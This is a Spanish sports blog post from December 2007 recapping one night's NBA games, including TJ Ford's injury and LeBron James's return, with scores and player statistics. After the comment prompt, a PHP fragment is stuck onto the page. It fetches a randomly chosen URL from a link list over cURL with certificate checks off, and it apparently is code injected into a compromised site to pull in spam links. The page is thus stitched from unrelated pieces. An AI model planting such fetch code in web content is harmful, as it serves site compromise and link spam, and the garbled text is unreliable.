La crónica (11/12/07)

12 de December de 2007 por MagicJohnson32

La tremenda lesión de TJ Ford marcó la madrugada en la NBA. En lo deportivo destacó el regreso de LeBron James con victoria de los Cavs en un partidazo… de Larry Hughes. También notables fueron los triunfos de los Blazers en Salt Lake City, el de los Warriors sobre unos Spurs sin Duncan y el de los Clippers pese al 93º triple doble de Kidd. Además los Pistons se pasearon ante los Grizzlies, los Bulls arrasaron a los Sonics y los Wizards ganaron sin problemas a los Wolves.

Vamos con la crónica de cada uno de los partidos disputados anoche:

Raptors 100 – 88 Hawkstjfordinjuryhawks

Poco importaba el resultado del partido. Jugadores, técnicos y público en el Philips Arena de Atlanta estaban pendientes de TJ Ford, tendido en el suelo, inmóvil. Eran los últimos minutos del partido entre Raptors y Hawks cuando Ford recuperó un balón, se disponía a finalizar un contraataque y dribló a Al Horford. Éste, incapaz de detener a Ford, le golpeó con dureza en la cara. El base de los Raptors, que se perdió la temporada 04-05 tras una operación de cervicales, se desplomó y hubo de ser retirado en camilla a un hospital, en el que aún permanece. En lo deportivo, Toronto se impuso sin muchas dificultades de la mano del propio Ford, máximo anotador del partido con 26 puntos en 11 de 15 tiros, a lo que añadió 8 asistencias. Calderón también brilló con 15 puntos y 7 asistencias en 18 minutos, y Chris Bosh hizo 20-13. En los locales, Joe Johnson y Marvin Williams anotaron 23 puntos pero Josh Smith tuvo un día aciago con sólo 5 puntos, 2 de 11 en tiros, 7 pérdidas y 6 faltas cometidas.

 

Wolves 88 – 102 Wizards

Los Wizards siguen sumando victorias sin Gilbert Arenas, aunque la de anoche no fue la más meritoria de todas. El equipo capitalinolebronpacersreturns se impuso a los T’Wolves sin apenas problemas en un partido que empezó a decantarse en el segundo cuarto con un parcial de 20-30. Caron Butler y Jamison, de nuevo los mejores por parte de los Wizards, firmaron sendos dobles-dobles (ambos con más de 20 puntos), y Haywood añadió 11 puntos y 14 rebotes. Entre los tres sumaron más rebotes que todo el equipo rival y la diferencia en este aspecto resultó abismal: 35-57. Y eso pese a la estelar actuación de Craig Smith, que se fue hasta los 36 puntos. Jefferson, mucho más discreto, se quedó en 14 y sólo Telfair les acompañó por encima de los 10.

Pacers 105 – 118 Cavs

Jamás se ha visto nada semejante. Los Cavs recibieron anoche a los Pacers con un backcourt titular compuesto por Eric Snow y Shannon Brown. En el banquillo esperaban LeBron James y Larry Hughes. Snow y Brown estuvieron en pista poco más de 50 minutos; James y Hughes, algo menos. Snow y Brown sumaron 8 puntos; James y Hughes, 53. LeBron regresó tras perderse los últimos cinco partidos (cinco derrotas) y se trajo consigo la mejor versión de Larry Hughes que han visto en Cleveland. Hughes brilló con 36 puntos, 13 de 17 en lanzamientos, 4 rebotes y 3 asistencias en apenas 26 minutos, y lideró la victoria de los Cavs sobre los Pacers pese a los 23 puntos, 6 rebotes y 5 asistencias de Mike Dunleavy. Los locales abrieron brecha en el primer cuarto, que se cerró con un 16-37, y ya no permitieron que los Pacers entrasen en el partido.

Clippers 91 – 82 Nets

Jason Kidd sumó un nuevo triple doble, y ya van 93 en su carrera. Los Nets sumaron una nueva derrota, y ya van 13 esta temporada. Los de New Jersey no arrancan y anoche kamanblocksnetsincluso se parecieron a sus vecinos, los Knicks, al ser abucheados por su público cuando Vince Carter lanzó un airball a pocos minutos para el final. Los Nets siguen pagando su paupérrimo juego interior, que anoche fue incapaz de frenar a Kaman, autor de 18 puntos, 14 rebotes y 2 tapones. Tim Thomas, con otros 18 puntos, y Maggette, con 13 y 10 rebotes, acompañaron bien a Kaman. Ambos equipos tuvieron serios problemas para anotar, especialmente unos Nets que firmaron un 5 de 25 en el último cuarto y un 32% en total.

Pistons 113 – 103 Grizzlies

Chauncey Billups y RIP Hamilton se merendaron a los Grizzlies. El base sumó 28 puntos y 14 asistencias, y el escolta añadió 27 puntos con 11 de 16 en tiros para llevar a los de Michigan a su 15ª victoria de la temporada. Los Grizzlies, por su parte, han perdido los últimos cinco partidos. Poco hicieron por evitarlo sus guards titulares, Stoudamire y Miller, que apenas sumaron 8 puntos con 2 de 8 en tiros. Mucho mejor rindió Lowry, con 18 puntos, los mismos que anotó Gasol, quien además añadió 8 rebotes y lideró a su equipo con 5 asistencias. Rudy Gay anotó 20 puntos y Warrick, 17, pero el partido estuvo siempre en manos visitantes, concretamente en las de Billups. Navarro fue suplente y no tuvo una noche brillante, con 8 puntos y sin rebotes ni asistencias.

Sonics 96 – 123 Bulls

Es bastante posible que los jugadores del equipo de Chicago le hayan visto las orejas al lobo y que la posibilidad de acabar en un equipo sin aspiraciones a nada como Memphis les haya servido de acicate. Los Bulls han ganado 5 de los últimos 7 partidos y empiezan a parecerse a un equipo. Esta noche han pasado por encima de los Sonics con un sólido 53% en tiro, lo cual es una gran mejoría para el equipo que peor estaba tirando de la NBA. Esta noche los pases a los jugadores libres han llegado, los tiros cómodos han llegado y las canastas han llegado. Cierto es que la defensa de Seattle es un coladero, pero por algo hay que empezar. Al mando de las operaciones ha estado Hinrich, que ha anotado 15 puntos, capturado 6 rebotes y repartido 8 asistencias, en lo que puede considerarse su mejor partido en toda la temporada. La responsabilidad anotadora ha recaído sobre Ben Gordon que, con 27 puntos en una buena serie de 12 de 19 intentos, ha puesto freno a las críticas, y sobre Luol Deng, con 20 puntos. En el equipo de Seattle tan sólo han destacado Durant con 16 puntos, Szczerbiak con 12 y un viejo conocido de la afición española, Gelabale, también con 12 puntos.

Trail Blazers 97 – 89 Jazzsloanargue

Portland se presentaba en Utah con una cosa a favor y otra en contra. A favor, haber ganado los tres encuentros disputados la semana pasada. En contra, presentarse frente a los Jazz sin uno de sus mejores hombres, Aldridge, aquejado de una fascitis plantar que le tendrá alejado de las pistas al menos una semana. Y sin embargo han sido capaces de ganar a los Jazz en su casa, justo donde éstos se muestran más sólidos. Las razones hay que buscarlas en el juego muy físico de los de Portland, que ha permitido frenar a un Deron Williams que con 11 puntos, 9 asistencias y 6 rebotes no ha conseguido poner en juego a su equipo como en partidos anteriores. Tan sólo Carlos Boozer, con 29 puntos y 11 rebotes, y Paul Millsap, con 14 puntos, han sido capaces de aportar algo. Especialmente destacado el mal momento de Kirilenko, que con tan sólo 3 puntos se ha visto superado en todo momento por los jugadores rivales. Por parte de Portland, la faceta anotadora ha recaido en Martell Webster, un jugador de tercer año al que hay que tener en cuenta para el futuro próximo y que ha anotado 25 puntos con una buena serie de 9 de 13, incluyendo 5 triples. La dirección de juego ha estado de nuevo en manos de Steve Blake, que parece haberse hecho definitivamente con el puesto de base titular en detrimento de Jarret Jack, mientras que Brandon Roy ha anotado 16 puntos. Sergio Rodriguez ha jugado 8 minutos y ha conseguido 4 puntos, 2 rebotes y 2 asistencias.

baronoverbarrySpurs 84 – 96 Warriors

Greg Popovich intentó un golpe de efecto sentando en el banquillo al todavía lesionado Tim Duncan vestido con el uniforme blanco de los Spurs, pero no le sirvió de nada. Los de Don Nelson, inmersos en una de las mejores rachas de sus historia con 12 partidos ganados de los últimos 15, no se dejaron intimidar por la presencia del jugador franquicia de San Antonio y, con un gran segundo cuarto, desarbolaron tanto la defensa como el ataque del rival. Ginóbili, que en los dos partidos anteriores había llevado el peso del ataque en ausencia de Duncan con 37 puntos, se quedó en tan sólo 13 con un pobre 4 de 14 en tiro. El mejor de San Antonio fue el center Matt Bonner, con 25 puntos y 17 rebotes. Los Warriors, de la mano de un gran Baron Davis, lograron situar a 5 jugadores por encima de 14 puntos. El base del equipo Oakland anotó 18 puntos, dio 6 asistencias y capturó 6 rebotes.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>